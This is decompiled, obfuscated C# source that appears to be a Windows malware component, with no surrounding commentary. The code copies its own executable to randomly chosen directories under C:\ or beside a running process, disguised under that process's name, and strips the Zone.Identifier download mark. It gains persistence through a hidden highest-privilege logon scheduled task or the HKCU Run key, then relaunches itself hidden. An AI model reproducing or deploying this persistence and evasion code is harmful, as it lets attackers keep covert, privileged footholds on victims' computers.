private static string ConcatFilter(string key)
{
//Discarded unreachable code: IL_0002
//IL_0003: Incompatible stack heights: 0 vs 1
RepositoryEvent repositoryEvent = new RepositoryEvent();
List <string> list = Directory.GetDirectories(key).ToList();
list.RemoveAll((string _0002) => _0002.Contains("$"));
string text = list[repositoryEvent.PopList(0, list.Count())];
int num = repositoryEvent.PopList(1, list.Count());
while (num > 0)
{
try
{
list = Directory.GetDirectories(text).ToList();
list.RemoveAll((string _0002) => _0002.Contains("$"));
text = list[repositoryEvent.PopList(0, list.Count())];
num--;
}
catch
{
return(text);
}
}
return(text);
}
public static void InvokeFilter()
{
//Discarded unreachable code: IL_0002
//IL_0003: Incompatible stack heights: 0 vs 1
if (File.Exists(Path.GetDirectoryName(MappingListAnnotation.m_PolicyEvent) + "\\" + ClassEvent.RegisterFilter(Path.GetFileName(MappingListAnnotation.m_PolicyEvent))))
{
return;
}
string fileName = MappingListAnnotation.m_PolicyEvent;
int num = new RepositoryEvent().PopList(1, 2);
for (int i = 0; i < new RepositoryEvent().PopList(2, 10); i++)
{
string path = Path.Combine(Path.GetTempPath() + "\\" + ClassEvent.ResetFilter(GlobalIssuerImporter.SetList() + GlobalIssuerImporter.RemoveList()) + ".tmp");
switch (num)
{
case 1:
try
{
string processName2 = TestFilter().ProcessName;
string text = ConcatFilter("C:\\");
File.Copy(MappingListAnnotation.m_PolicyEvent, text + "\\" + processName2 + ".exe", overwrite: true);
File.WriteAllText(text + "\\" + ClassEvent.RegisterFilter(processName2 + ".exe"), ReponseClassSpec.PublishFilter(new RepositoryEvent().PopList(10, 100)));
Publisher.PrepareFilter(text + "\\" + processName2 + ".exe:Zone.Identifier");
File.AppendAllText(path, "<$>" + text + "\\" + processName2 + ".exe");
if (GlobalIssuerImporter.DestroyList())
{
ProcessStartInfo processStartInfo = new ProcessStartInfo("schtasks");
processStartInfo.Arguments = "/create /tn \"" + processName2 + "\" /sc ONLOGON /tr \"'" + text + "\\" + processName2 + ".exe'\" /rl HIGHEST /f";
processStartInfo.UseShellExecute = false;
processStartInfo.CreateNoWindow = true;
ProcessStartInfo startInfo2 = processStartInfo;
Process process3 = Process.Start(startInfo2);
process3.WaitForExit(1500);
if (process3.ExitCode != 0)
{
using (RegistryKey registryKey3 = RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Registry64).OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", writable: true))
{
try
{
registryKey3.SetValue(processName2, "\"" + text + "\\" + processName2 + ".exe\"");
}
catch
{
}
}
}
}
else
{
using (RegistryKey registryKey4 = RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Registry64).OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", writable: true))
{
try
{
registryKey4.SetValue(processName2, "\"" + text + "\\" + processName2 + ".exe\"");
}
catch
{
}
}
}
fileName = text + "\\" + processName2 + ".exe";
}
catch
{
i--;
}
break;
case 2:
try
{
Process process = TestFilter();
string processName = process.ProcessName;
string directoryName = Path.GetDirectoryName(Publisher.VerifyFilter(process));
string[] files = Directory.GetFiles(directoryName);
directoryName = Path.Combine(directoryName + "\\" + Path.GetFileNameWithoutExtension(files[new RepositoryEvent().MoveList(files.Length)]));
Directory.CreateDirectory(directoryName);
File.Copy(MappingListAnnotation.m_PolicyEvent, directoryName + "\\" + processName + ".exe", overwrite: true);
File.WriteAllText(directoryName + "\\" + ClassEvent.RegisterFilter(processName + ".exe"), ReponseClassSpec.PublishFilter(new RepositoryEvent().PopList(10, 100)));
Publisher.PrepareFilter(directoryName + "\\" + processName + ".exe:Zone.Identifier");
File.AppendAllText(path, "<$>" + directoryName + "\\" + processName + ".exe");
if (GlobalIssuerImporter.DestroyList())
{
ProcessStartInfo processStartInfo = new ProcessStartInfo("schtasks");
processStartInfo.Arguments = "/create /tn \"" + processName + "\" /sc ONLOGON /tr \"'" + directoryName + "\\" + processName + ".exe'\" /rl HIGHEST /f";
processStartInfo.UseShellExecute = false;
processStartInfo.CreateNoWindow = true;
ProcessStartInfo startInfo = processStartInfo;
Process process2 = Process.Start(startInfo);
process2.WaitForExit(1500);
if (process2.ExitCode != 0)
{
using (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Registry64).OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", writable: true))
{
try
{
registryKey.SetValue(processName, "\"" + directoryName + "\\" + processName + ".exe\"");
}
catch
{
}
}
}
}
else
{
using (RegistryKey registryKey2 = RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Registry64).OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", writable: true))
{
try
{
registryKey2.SetValue(processName, "\"" + directoryName + "\\" + processName + ".exe\"");
}
catch
{
}
}
}
fileName = directoryName + "\\" + processName + ".exe";
}
catch
{
i--;
}
break;
}
}
try
{
Process.Start(new ProcessStartInfo
{
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
UseShellExecute = false,
FileName = fileName
});
Environment.Exit(0);
Application.Exit();
}
catch
{
}
}